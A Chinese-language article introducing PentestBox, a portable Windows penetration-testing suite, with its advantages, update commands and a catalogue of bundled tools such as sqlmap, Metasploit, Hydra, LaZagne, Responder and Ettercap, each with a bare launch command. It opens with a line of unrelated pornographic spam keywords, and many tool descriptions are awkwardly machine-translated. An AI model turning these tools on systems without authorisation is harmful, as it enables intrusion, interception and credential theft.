操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    1、pentestbox簡介

    Pentest Box是一款Windows平臺下預配置的便攜式開源滲透測試環境,而它也是著名黑客Kapustkiy常用的工具之一。

    在安全測試的過程中,大部分腳本工具都是基于Linux平臺運行,比如bash、cat、chmod、curl、git、gzip、ls、mv、ps、 ssh、sh、uname等。Linux相比windows,安裝和更新軟件更加高效,排除故障更加方便和穩定。windows窗口化界面操作和特殊工具 的兼容性,也導致大部分安全人員嚴重依賴于windows系統,因此使用windows的安全測試人員大部分都會在虛擬機內運行各式各樣的Linux操作 系統。

    但是虛擬機運行Linux也有相對應的缺點,首先是內存占用過高,其次是操作沒有那么方便。基于以上問題,Pentest Box被開發出來了。

    2、pentestbox優點

    2.1、易于使用

    Pentest Box和Linux有些相似,可以完全依靠命令行工具進行使用,這點很符合Linux和Mac OS發燒友的口味。

    2.2、設計簡潔

    整個Pentest從安裝到使用非常簡潔,就靠一個exe文件來啟動,并且安裝也是一鍵式安裝。除了安裝目錄以外,沒有多余的地方需要設置。

    2.3、性能卓越

    和虛擬機相比,Pentest Box完全運行于Windows系統上,不依賴任何虛擬系統,有著更加強悍的性能。

    2.4、沒有依賴需求

    如果我們要在windows上使用SQLMAP或者metasploit之類的工具,可能需要安裝各種各樣的語言環境,比如python,ruby,php,Java等。但是所有的依賴需求都已經安裝在Pentest Box內部,你無需再去安裝任何環境,設置任何環境變量等。

    2.5、方便攜帶

    Pentest Box不需要安裝注冊表,不需要特別的驅動,因此有極強的攜帶性,可以直接拷貝到U盤內運行。

    2.6、Linux 工具集

    Pentest Box工具包內含有各式各樣的Linux工具,包括但不限于bash、cat、chmod、curl、git、gzip、ls、mv、ps、ssh、sh、uname等,它甚至包含了Linux編輯神器 “vim”。

    2.7、無驅動問題

    在VM中運行Linux最頭疼的主要是驅動兼容問題,就算有VM TOOL的支持,有時候也會爆出各種各樣的bug。但是在Pentest Box無需擔心這個問題。只要windows內安裝了相關驅動,就沒必要再去考慮驅動問題。

    2.8、模塊化

    雖然Pentest Box已經集成了非常多優秀的Linux工具,但是你依然可以自定義添加自己的模塊。Pentest Box中的toolsmanager可以對Pentest Box內部的工具進行更新,卸載和安裝。

    2.9、更少的內存占用

    一般情況下,在虛擬機中運行Linux系統可能需要2GB的內存,但是在Pentest Box中只需要20MB的內存。

    2.10、更少的磁盤占用

    我安裝完帶MSF的Pentest Box,大約占用了4.5GB的硬盤,而我安裝完Kali Linux 64位的VM后則占用了20多GB的硬盤。可見相對于虛擬機Linux來說,Pentest Box占用更小的空間。

    2.11、內置瀏覽器

    Pentest Box中內置一個Firefox瀏覽器,并且已經安裝好優秀的安全測試插件。測試插件的列表我等等會在下方寫出來。

    2.12、可更新特性

    雖然Pentest Box中的toolsmanager功能可以對腳本進行更新,但是Pentest Box依然有自己的更新指令,可以對框架,配置文件,環境等進行更新。

    2.13、易于分享

    正如我所說,Pentest Box有著優秀的攜帶性,因此它還可以安裝在云端,達到一個多人共用協作的功能,比如dropbox,百度云盤,google云盤等。

    2.14、32位和64位系統支持

    大部分工具可能并不太會關心windows 32位的兼容性,但是Pentest Box可以完美兼容32位和64位的windows系統。Pentest Box的開發人員已經在ASUS X205TA(售價200美元的低配電腦)上以windows 32位系統完美運行Pentest Box。

    3、安裝與使用

    下載安裝,Pentest Box官方下載頁面:

    1. https://pentestbox.org/zh/#download

    安裝也沒什么復雜的,隨便安裝再哪個磁盤都可以,你安裝在Dropbox或者百度云盤內都沒問題。但是下載的時候注意了,下載選項上有兩個選項,一個是包含Metasploit的,一個是未包含Metasploit的。這里根據大家的需求來選擇下載。

    pentestbox更新:

    1. C:\Users\administrator\Desktop
    2. > update
    3. Updating Required Files
    4. Fetching origin
    5. HEAD is now at 7c8bfc3 Update mitmproxy
    6. Welcome to PentestBox tools update Utility.
    7. +-----------------------------+------------------------------------+
    8. | Commands | |
    9. +-----------------------------+------------------------------------+
    10. | update all | Updates Everything in PentestBox |
    11. | update android | Updates Android Security Tools |
    12. | update exploitation | Updates Exploitation Tools |
    13. | update forensics | Updates Forensics Tools |
    14. | update informationgathering | Updates InformationGathering Tools |
    15. | update passwordattacks | Updates Password Attacks Tools |
    16. | update reverseengineering | Updates Reverse Engineering Tools |
    17. | update sniffing | Updates Sniffing Tools |
    18. | update stresstesting | Updates Stress Testing Tools |
    19. | update webapplication | Updates WebApplication Tools |
    20. | update config | Updates PentestBox Config Files |
    21. +-----------------------------+------------------------------------+

    pentestbox相關鏈接

    1. Pentest Box官網:https://www.pentestbox.org
    2. Pentest Box官方下載頁面:https://pentestbox.org/zh/#download
    3. Pentest Box官方文檔:https://docs.pentestbox.org
    4. Pentest Box twitter:https://twitter.com/pentestbox
    5. Pentest Box Facebook:https://www.facebook.com/pentestbox
    6. Pentest Box Telegram:https://telegram.me/pentestbox
    7. Pentest Box論壇:https://groups.google.com/forum/#!forum/pentest-box-forum
    8. Pentest Box GitHub地址:https://github.com/pentestbox
    9. Pentest Box 火狐瀏覽器已安裝插件:https://addons.mozilla.org/en-US/firefox/collections/pentestbox/pentestbox-addons-collection/?page=1
    10. Pentest Box已知未被安裝腳本列表:https://modules.pentestbox.org/
    11. Pentest Box內置默認工具名單列表:https://tools.pentestbox.org/#linux-utilities

    4、工具詳情與說明

    4.1、Web漏洞掃描器

    Burp Suite

    是用于攻擊web 應用程序的集成平臺。它包含了許多工具,并為這些工具設計了許多接口,以促進加快攻擊應用程序的過程。

    所有的工具都共享一個能處理并顯示HTTP 消息,持久性,認證,代理,日志,警報的一個強大的可擴展的框架。

    C:\Users\Demon\Desktop
    >burpsuite
    

    Commix

    有一個簡單的環境,它可以被使用,從web開發人員,滲透測試人員甚至安全研究人員測試web應用程序的視圖找到錯誤,錯誤或漏洞相關命令注入攻擊。

    C:\Users\Demon\Desktop
    >commix
    

    dotdotpwn

    這是一個非常靈活的智能fuzzer發現遍歷目錄等軟件的漏洞HTTP / FTP / TFTP服務器,網絡平臺如cms,erp,博客,等等。

    C:\Users\Demon\Desktop
    >dotdotpwn
    

    fimap

    fimap有點python工具可以找到,準備、審計、利用甚至谷歌自動在webapps本地和遠程文件包含漏洞。fimap應該像sqlmap LFI / RFI代替sql注入漏洞。這是目前正在發展但它是可用的。

    C:\Users\Demon\Desktop
    >fimap
    

    Golismero

    GoLismero安全性測試的是一個開源框架。這是目前針對網絡安全,但它可以很容易地擴展到其他類型的掃描。

    C:\Users\Demon\Desktop
    >golismero
    

    jSQL

    jSQL注入是一個輕量級應用程序用于查找數據庫信息從一個遙遠的服務器。jSQL是免費的,開放源碼和跨平臺(Windows、Linux、Mac OS X、Solaris)。

    C:\Users\Demon\Desktop
    >jSQL
    

    Nikto

    Nikto是一個開源的web服務器(GPL)掃描儀對web服務器執行全面測試多個項目,包括超過6700個有潛在危險的文件/程序,檢查超過1250臺服務器的過時的版本,和版本超過270服務器上的具體問題。

    C:\Users\Demon\Desktop
    >nikto
    

    PadBuster

    自動化腳本執行Padding Oracle的攻擊。

    C:\Users\Demon\Desktop
    >padbuster
    

    SqlMap

    sqlmap是一個開源的滲透測試工具,自動檢測和利用SQL注入漏洞的過程和接管的數據庫服務器。它有一個強大的檢測引擎,許多細分功能的最終滲透試驗器和廣泛的開關持續指紋數據庫,從數據庫獲取數據,訪問底層文件系統和操作系統上執行命令通過帶外連接。

    C:\Users\Demon\Desktop
    >sqlmap
    

    Vega

    Vega 是一個免費和開源的掃描儀和測試平臺,測試web應用程序的安全。織女星可以幫助你找到并驗證SQL注入、跨站腳本(XSS),不經意間透露敏感信息,和其他漏洞。它是用Java編寫的,基于GUI的,運行在Linux上,OS X和窗戶。

    C:\Users\Demon\Desktop
    >vega
    

    Wpscan

    WPScan是一個黑盒WordPress漏洞掃描器,可以用來掃描遠程WordPress安裝發現安全問題。

    C:\Users\Demon\Desktop
    >wpscan
    

    Yasuo

    Yasuo是一個ruby腳本掃描脆弱的第三方web應用程序。工作時在網絡安全評估(內部、外部redteam演出等),我們經常碰到脆弱的第三方web應用程序或web前端,讓我們妥協遠程服務器利用公開已知的漏洞。一些常見的和最喜歡的Apache Tomcat應用程序管理界面,JBoss jmx控制臺

    C:\Users\Demon\Desktop
    >yasuo
    

    Zaproxy

    OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。

    C:\Users\Demon\Desktop
    >zap
    

    4.2、Web應用程序代理

    Burp Suite

    Burp Suite是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。

    C:\Users\Demon\Desktop
    >burpsuite
    

    Zaproxy

    OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。

    C:\Users\Demon\Desktop
    >zap
    

    4.3、CMS漏洞掃描器

    CMSmap

    CMSmap python開源CMS掃描,自動檢測安全漏洞的過程中最受歡迎的CMS。CMSmap的主要目的是為不同類型的cms集成常見漏洞在一個單一的工具。

    C:\Users\Demon\Desktop
    >cmsmap
    

    droopescan

    基于插件的掃描儀,幫助安全研究人員識別問題

    Drupal。

    SilverStripe

    Wordpress

    C:\Users\Demon\Desktop
    >droopescan
    

    OWASP

    Joomla漏洞掃描器——Joomla!它可能是最廣泛使用的CMS,由于其靈活性,用戶友好性,可擴展性命名一些。因此,觀察其漏洞,并添加像KB這樣的漏洞到Joomla掃描器需要持續的活動。它將幫助Web開發人員和Web 大師幫助識別他們部署的Joomla可能的安全弱點! 網站。 沒有Web安全掃描程序僅專用于一個CMS。

    C:\Users\Demon\Desktop
    >joomscan
    

    Wpscan

    WPScan是一個黑盒WordPress漏洞掃描器,可以用來掃描遠程WordPress安裝發現安全問題。

    C:\Users\Demon\Desktop
    >wpscan
    

    VbScan

    VBScan perl編程語言是一個開源項目的檢測鏈入頁面CMS漏洞和分析。

    C:\Users\Demon\Desktop
    >vbscan
    

    4.4、網絡爬蟲程序

    DirBuster——DirBuster是一個多線程java應用程序,旨在強制在Web /應用程序服務器上強制目錄和文件名。

    作者:OWASP.org

    許可:Apache 2.0

    C:\Users\Demon\Desktop
    >dirbuster
    

    Burp Suite

    Burp Suite 是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。

    作者:Portswigger

    C:\Users\Demon\Desktop
    >burpsuite
    

    4.5、信息收集

    Angry IP Scanner

    Angry IP Scanner (或者只是ipscan)是一個開源和跨平臺的網絡掃描器設計為快速和易于使用。它掃描IP地址和端口,以及許多其他功能。人們普遍使用的網絡管理員,只是好奇的世界各地的用戶,包括大型和小型企業、銀行和政府機構。

    C:\Users\Demon\Desktop
    >ipscan
    

    dnsrecon

    DNS枚舉腳本

    許可:GPLv2

    C:\Users\Demon\Desktop
    >dnsrecon
    

    Golismero

    GoLismero安全性測試的是一個開源框架。這是目前針對網絡安全,但它可以很容易地擴展到其他類型的掃描。

    許可:GPLv2

    C:\Users\Demon\Desktop
    >golismero
    

    Instarecon

    自動化的基本數字偵察。偉大的目標獲得最初的足跡,發現額外的子域。InstaRecon會做的事:

    DNS(直接、PTR MX,NS)查找

    域名查詢服務(域和IP)查找

    谷歌在搜索的子域狗屁不是

    Shodan查找

    在整個cidr反向DNS查找

    許可:麻省理工學院的許可

    C:\Users\Demon\Desktop
    >instarecon
    

    Nmap

    Nmap(“網絡映射器”)是一個免費和開源(許可證)實用程序用于網絡發現和安全審計。許多系統和網絡管理員也發現它有用的任務,比如網絡庫存,管理服 務升級計劃,和監控主機或服務正常運行時間。Nmap使用原始IP數據包在小說方面來確定網絡上的主機可用,哪些服務(應用程序名稱和版本)提供這些主 機,操作系統(OS版本)他們正在運行,什么類型的數據包過濾器/防火墻正在使用,和幾十個其他的特征。它旨在快速掃描大型網絡,但對單一主機工作正常。 Nmap運行在所有主要的電腦操作系統,和官方二進制包可供Linux,Windows,和Mac OS x除了經典Nmap命令行可執行文件,Nmap套件包括一個先進的GUI和結果查看器(Zenmap),一個靈活的數據傳輸,重定向,和調試工具 (Ncat),比較掃描結果的一個實用程序(Ndiff)和數據包生成和響應分析工具(np)。

    許可:GPLv2

    為了使用Nmap,你需要首先安裝WinPcap包捕獲庫,可以從Winpcap.org下載。

    cmd.exe
    C:\Users\Demon\Desktop
    >nmap
    cmd.exe
    C:\Users\Demon\Desktop
    >ncat
    cmd.exe
    C:\Users\Demon\Desktop
    >ndiff
    cmd.exe
    C:\Users\Demon\Desktop
    >nping
    

    Responder

    Responder 是一個LLMNR NBT-NS和mdn投毒者,內置HTTP / SMB /該軟件/ FTP / LDAP流氓身份驗證服務器支持NTLMv1 / NTLMv2 / LMv2,延長安全NTLMSSP和HTTP基本身份驗證。

    作者:SpiderLabs

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >responder
    

    SnmpWalk

    SnmpWalk允許你檢測一組變量可用于某一設備上閱讀。你可以獲得一個完整的列表或部分。通過分析網絡設備掃描獲得的結果使用SnmpWalk可以開發一個支持的mib列表,通過這種方式,獲得完整的描述變量和可能的值。

    作者:SnmpSoft公司

    cmd.exe
    C:\Users\Demon\Desktop
    >snmpwalk
    

    SpiderFoot

    SpiderFoot是一個開源情報自動化工具。它的目標是實現自動化的過程對給定目標收集情報,這可能是一個IP地址,域名、主機名或網絡子網。 SpiderFoot可以用來進攻,即作為黑盒的一部分滲透測試收集的信息目標或防守來識別你的組織是免費提供什么信息對你攻擊者使用。

    cmd.exe
    C:\Users\Demon\Desktop
    >spiderfoot
    

    TestSSLServer

    TestSSLServer是一個簡單的命令行工具,聯系一個SSL / TLS服務器(名稱和端口給出參數),獲得一些信息。

    作者:托馬斯Pornin

    cmd.exe
    C:\Users\Demon\Desktop
    >testsslserver
    

    SSlStrip

    它將透明地劫持HTTP交通網絡上,注意HTTPS連接和重定向,然后這些鏈接映射到類似的HTTP鏈接或homograph-similar HTTPS連接。它還支持模式提供一個看起來像一個鎖圖標標識,選擇性伐木、否認和會話。

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >sslstrip
    

    SSLyze

    SSLyze是一個Python工具,可以分析一個服務器的SSL配置連接到它。設計為快速和全面的,應該幫助組織和測試人員識別SSL服務器配置錯誤影響他們。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >sslyze
    

    SSLScan

    SSLScan測試SSL / TLS啟用服務發現支持密碼套件。

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >sslscan
    

    Sublist3r

    Sublist3r是python工具,旨在列舉子域的網站使用搜索引擎。它有助于滲透測試和bug獵人收集和收集他們的目標域的子域。 Sublist3r目前支持以下搜索引擎:谷歌,雅虎,必應,百度,問。更多的搜索引擎可能被添加在未來。使用Netcraft和DNSdumpster Sublist3r也收集子域。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >sublist3r
    

    Subbrute

    SubBrute是一個社區驅動的項目的目標創造最快的和最精確的子域名枚舉的工具。背后的一些魔法SubBrute是它使用解析器作為一種開放代理繞過DNS病原。這個設計還提供了一層匿名,SubBrute不直接發送交通目標的名字服務器。

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >subbrute
    

    Tekdefense

    Automater-自動化是一個URL /域名,IP地址和Md5 hash OSINT工具旨在使分析過程更容易入侵分析師。給定一個目標(URL、IP或散列)或一個文件全自動化目標將返回相關的結果來源如 下:IPvoid.com,Robtex.com,Fortiguard.com,unshorten。 我,Urlvoid.com,Labs.alienvault.com,ThreatExpert VxVault,VirusTotal。

    作者:TekDefense.com

    cmd.exe
    C:\Users\Demon\Desktop
    >automater
    

    UrlCrazy

    生成和測試域輸入錯誤和變化檢測和執行錯誤蹲,URL劫持,釣魚,和企業間諜活動。

    許可:非商業性

    cmd.exe
    C:\Users\Demon\Desktop
    >urlcrazy
    

    The Harvester

    The Harvester 電子郵件帳戶,子域名名稱、虛擬主機、開放端口/橫幅,和員工的名字從不同的公共資源(搜索引擎,pgp關鍵服務器)。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >theharvester
    

    Wireshark

    Wireshark是世界上最重要的網絡協議分析儀。它讓你看到發生了什么在您的網絡在微觀水平。這是事實上的標準(通常法理)在許多行業和教育機構。Wireshark發展繁榮的貢獻全球網絡專家。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >wireshark
    

    4.6、開發工具

    Beef Project

    beef是瀏覽器開發框架。這是一個滲透測試工具,它關注的是web瀏覽器。

    作者:Wade Alcorn

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >beefproject
    

    CrackMapExec

    其中的瑞士軍刀Windows /活動目錄環境。

    多虧了托馬斯。編譯的版本。

    作者:byt3bl33d3r

    cmd.exe
    C:\Users\Demon\Desktop
    >crackmapexec
    

    Metasploit

    Framework——世界上最好用滲透測試框架。

    作者:Rapid7

    許可:BSD 3條款許可協議

    請注意PentestBox的有兩個版本,一個與Metasploit Metasploit和另一個。如果沒有完成下載Metasploit變體在這里。

    cmd.exe
    C:\Users\Demon\Desktop
    cmd.exe
    C:\Users\Demon\Desktop
    >msfvenom
    cmd.exe
    C:\Users\Demon\Desktop
    >msfelfscan
    cmd.exe
    C:\Users\Demon\Desktop
    >msfbinscan
    cmd.exe
    C:\Users\Demon\Desktop
    >msfpescan
    cmd.exe
    C:\Users\Demon\Desktop
    >msfd
    cmd.exe
    C:\Users\Demon\Desktop
    >msfmachscan
    

    SqlMap

    sqlmap是一個開源的滲透測試工具,自動檢測和利用SQL注入漏洞的過程和接管的數據庫服務器。它有一個強大的檢測引擎,許多細分功能的最終滲透試驗器和廣泛的開關持續指紋數據庫,從數據庫獲取數據,訪問底層文件系統和操作系統上執行命令通過帶外連接。

    作者:Miroslav Stampar Bernardo Damele Assumpcao吉馬良斯

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    

    4.7、密碼破解

    Burp Suite

    Burp Suite是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。

    cmd.exe
    C:\Users\Demon\Desktop
    >burpsuite
    

    Findmyhash

    findmyhash。py嘗試不同類型的裂縫散列使用免費的在線服務。

    作者:JulGor

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >findmyhash
    

    HashIdentifier

    軟件來識別不同類型的散列加密數據,尤其是密碼使用。

    作者:Zion3R

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >hashidentifier
    

    Hashcat

    Hashcat是世界上最快的CPU-based密碼恢復工具。

    許可證

    cmd.exe
    C:\Users\Demon\Desktop
    >hashcat-cli32
    cmd.exe
    C:\Users\Demon\Desktop
    >hashcat-cli64
    cmd.exe
    C:\Users\Demon\Desktop
    >hashcat-cliXOP
    

    LaZagne

    LaZagne項目是一個開放源碼應用程序用于檢索大量的密碼存儲在本地計算機。每個軟件存儲密碼使用不同的技術(明文、api、自定義算法、數據庫 等)。這個工具已經開發為目的的找到這些密碼為最常用的軟件。這時,它支持22個項目在使用微軟的Windows操作系統和12在Linux /類unix操作系統。

    作者:AlessandroZ

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >lazagne
    

    John the Ripper

    John the Ripper是一個快速密碼餅干,目前對于許多風格的Unix,窗戶,DOS,BeOS和OpenVMS。它的主要目的是檢測弱Unix密碼。除了在各種Unix系統上最常見的幾種crypt(3)密碼哈希類型,支持開箱即用的是Windows LM hash,以及社區增強版本中的大量其他哈希和密碼。

    cmd.exe
    C:\Users\Demon\Desktop
    >johntheripper
    

    Patator

    Patator是出于對使用Hydra,Medusa,Ncrack,Metasploit模塊和Nmap NSE腳本的密碼猜測攻擊的挫折。我選擇了不同的方法,以便不創建另一個暴力的工具,并避免重復相同的缺點。 Patator是一個用Python編寫的多線程工具,力求比其他前輩更可靠和更靈活。

    作者:Sebastien MACKE

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >patator
    

    RainbowCrack

    RainbowCrack是Philippe Oechslin更快的時間存儲器權衡技術的一般建議實現。 它裂紋散列與彩虹表.RainbowCrack使用時間內存權衡算法來破解哈希。它不同于強力哈希餅干。強力哈希餅干生成所有可能的明文,并在飛行中計算相應的哈希,然后將哈希與要破解的哈希進行比較。一旦找到匹配,找到明文。 如果所有可能的明文都被測試并且沒有找到匹配,則找不到明文。利用這種類型的散列破解,丟棄所有中間計算結果。

    作者:RainbowCrack項目

    cmd.exe
    C:\Users\Demon\Desktop
    >rcrack
    cmd.exe
    C:\Users\Demon\Desktop
    >rt2rtc
    cmd.exe
    C:\Users\Demon\Desktop
    >rtgen
    cmd.exe
    C:\Users\Demon\Desktop
    >rtsort
    cmd.exe
    C:\Users\Demon\Desktop
    >rcrack_cl
    cmd.exe
    C:\Users\Demon\Desktop
    >rcrack_cl_gui
    cmd.exe
    C:\Users\Demon\Desktop
    >rcrack_cuda
    cmd.exe
    C:\Users\Demon\Desktop
    >rcrack_cuda_gui
    

    THC Hydra

    Hydra是一個并行登錄餅干支持眾多的協議攻擊。非常快和靈活,很容易添加新的模塊。這個工具可以讓研究人員和安全顧問展示將是多么容易獲得未授權訪問遠程系統。

    請注意,PentestBox包含編譯的版本THC-Hydra來自在這里.

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >hydra
    cmd.exe
    C:\Users\Demon\Desktop
    >pw-inspector
    

    Zaproxy

    OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。

    作者:Simon Bennetts

    cmd.exe
    C:\Users\Demon\Desktop
    >zap
    

    4.8、安卓系統安全

    AndroBugs Framework

    AndroBugs Android脆弱性分析框架是一個系統,有助于開發人員或黑客在Android應用程序找到潛在的安全漏洞。沒有燦爛的GUI界面,但最有效的(平均每掃描不到2分鐘)和更準確。

    作者:AndroBugs

    作者:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >androbugs
    

    Androguard逆向工程,惡意軟件和goodware Android應用程序的分析……和更多(忍者!)

    作者: Anthony Desnos

    許可:Apache版本2.0

    cmd.exe
    C:\Users\Demon\Desktop
    >androapkinfo
    cmd.exe
    C:\Users\Demon\Desktop
    >androarsc
    cmd.exe
    C:\Users\Demon\Desktop
    >androauto
    cmd.exe
    C:\Users\Demon\Desktop
    >androaxml
    cmd.exe
    C:\Users\Demon\Desktop
    >androcsign
    cmd.exe
    C:\Users\Demon\Desktop
    >androdd
    cmd.exe
    C:\Users\Demon\Desktop
    >androdiff
    cmd.exe
    C:\Users\Demon\Desktop
    >androdis
    cmd.exe
    C:\Users\Demon\Desktop
    >androgui
    

    Androwarn

    Androwarn是一個工具,它的主要目的是對潛在的惡意行為檢測和警告用戶開發的Android應用程序。

    作者: Thomas D

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >androwarn
    

    ApkTool

    逆向工程第三方的工具,關閉,二進制Android應用程序。它可以解碼資源接近原始形式和重建后做一些修改,這使得有可能逐步調試smali代碼。還使用一個應用程序就會變得容易些,因為項目的文件結構和自動化等重復性的任務構建apk,等等。

    作者:Connor Tumbleson, Ryszard Wi?niewski

    許可:Apache版本

    cmd.exe
    C:\Users\Demon\Desktop
    >apktool
    

    ByteCode Viewer

    反向工程第三方,封閉,二進制Android應用程序的工具。它可以將資源解碼為幾乎原始的形式,并在做出一些修改后重建它們; 它使得可以一步一步地調試smali代碼。此外,它使一個應用程序的工作更容易,因為像項目一樣的文件結構和自動化一些重復的任務,如構建apk等。

    作者:konloch

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >bytecodeviewer
    

    dex2jar

    轉換。dex文件。類文件(壓縮jar)

    作者:鮑勃·潘

    許可:Apache版本

    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-dex2jar
    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-dex2smali
    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-jar2dex
    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-decrypt-string
    

    Jadx

    敏捷的Java編譯器

    作者:skylot

    許可:Apache

    cmd.exe
    C:\Users\Demon\Desktop
    >jadx
    cmd.exe
    C:\Users\Demon\Desktop
    >jadx-gui
    

    JD-GUI

    JD-GUI是一個獨立的圖形工具顯示的Java源代碼”。階級”文件。你可以瀏覽重建源代碼JD-GUI即時訪問方法和字段。

    許可:免費非商業用途

    cmd.exe
    C:\Users\Demon\Desktop
    >jd-gui
    

    Pidcat

    彩色logcat腳本,只顯示了一個特定的應用程序包的日志條目。

    作者 Jake Wharton

    cmd.exe
    C:\Users\Demon\Desktop
    >pidcat
    

    4.9、逆向工程

    ApkTool

    逆向工程第三方的工具,關閉,二進制Android應用程序。它可以解碼資源接近原始形式和重建后做一些修改,這使得有可能逐步調試smali代碼。還使用一個應用程序就會變得容易些,因為項目的文件結構和自動化等重復性的任務構建apk,等等。

    作者:Connor Tumbleson, Ryszard Wi?niewski

    許可:Apache版本

    cmd.exe
    C:\Users\Demon\Desktop
    >apktool
    

    dex2jar

    轉換。dex文件。類文件(壓縮jar)

    作者:Bob Pan

    許可:Apache版本

    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-dex2jar
    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-dex2smali
    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-jar2dex
    cmd.exe
    C:\Users\Demon\Desktop
    >d2j-decrypt-string
    

    Jad

    Jad provides提供了一個命令行用戶界面從類文件中提取源代碼。

    作者: Pavel Kouznetsov

    cmd.exe
    C:\Users\Demon\Desktop
    >jad
    

    JD-GUI

    JD-GUI是一個獨立的圖形工具顯示的Java源代碼”。階級”文件。你可以瀏覽重建源代碼JD-GUI即時訪問方法和字段。

    許可:免費非商業用途

    cmd.exe
    C:\Users\Demon\Desktop
    >jd-gui
    

    JavaSnoop

    JavaSnoop是安全工具,它允許一個方面安全測試人員輕松地測試Java應用程序的安全。

    作者:www.aspectsecurity.com

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    

    OllyDbg

    OllyDbg 32位匯編級別分析調試器為Microsoft?Windows?

    作者:Oleh pokalchuk Yuschuk

    cmd.exe
    C:\Users\Demon\Desktop
    >ollydbg
    

    Radare2

    r2是從頭開始的重寫,以提供一組庫和工具來處理二進制文件.Radare項目作為取證工具啟動,腳本命令行十六進制編輯器能夠打開磁盤文件,但后來支持分析二進制文件,反匯編代碼,調試程序,附加到遠程gdb服務器。

    cmd.exe
    C:\Users\Demon\Desktop
    >radare2
    

    打開網絡服務器,請遵循下面。

    cmd.exe
    C:\Users\Demon\Desktop
    >radare2directory
    C:\PentestBox\bin\ReverseEngineering\radare2
    $radare2.exe - c=H rax2.exe
    

    Smali/Baksmali

    smali / baksmali是dalvik使用的dex格式的匯編/反匯編器,Android的Java VM實現。 語法是松散地基于Jasmin的/ dedexer的語法,并支持dex格式的完整功能(注釋,調試信息,行信息等)。您可以通過鍵入smali和baksmali訪問smali和baksmali

    許可:BSD

    cmd.exe
    C:\Users\Demon\Desktop
    >smali
    cmd.exe
    C:\Users\Demon\Desktop
    >baksmali
    

    4.10、壓力測試

    THC-SSL-DOS

    THC-SSL-DOS工具是一個概念證明披露可疑SSL的安全工具。這工作好如果服務器支持SSL重新談判。它仍然工作如果不支持SSL重新談判,但之前需要一些修改和更多的機器人可以看到產生影響。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    

    4.11 嗅探

    Burp Suite

    Burp Suite 是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。

    cmd.exe
    C:\Users\Demon\Desktop
    >burpsuite
    

    DNSChef

    DNSChef是一個高度可配置DNS代理滲透測試人員和惡意軟件分析師。DNS代理(又名“假DNS”)是一個工具用于應用程序的網絡流量分析等用途。 例如,可以使用DNS代理偽造請求“badguy.com”指向一個本地機器終止或攔截,而不是一個真正的主機在互聯網上的某個地方。

    作者:thesprawl

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >dnschef
    

    Ettercap

    Ettercap是一套綜合的中間人攻擊。它嗅探的實時連接,動態內容過濾和其他許多有趣的把戲。它支持主動和被動解剖的許多協議和包括許多功能網絡和主機的分析。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >ettercap
    

    ngrep

    ngrep pcap-aware工具將允許您指定擴展正則表達式匹配的數據包有效載荷數據。

    cmd.exe
    C:\Users\Demon\Desktop
    >ngrep
    

    Network Miner

    NetworkMiner可以用作被動網絡嗅探器/數據包捕獲工具,以便檢測操作系統,會話,主機名,開放端口等,而不在網絡上引入任何流量。 NetworkMiner還可以解析PCAP文件進行離線分析,并從PCAP文件重新生成/重新組合傳輸的文件和證書。

    作者:NETRESEC

    cmd.exe
    C:\Users\Demon\Desktop
    >networkminer
    

    Responder

    Responder 是LLMNR,NBT-NS和MDNS中毒程序,內置支持NTLMv1 / NTLMv2 / LMv2,擴展安全性NTLMSSP和基本HTTP身份驗證的HTTP / SMB / MSSQL / FTP / LDAP流氓認證服務器。

    許可:GPLv3

    cmd.exe
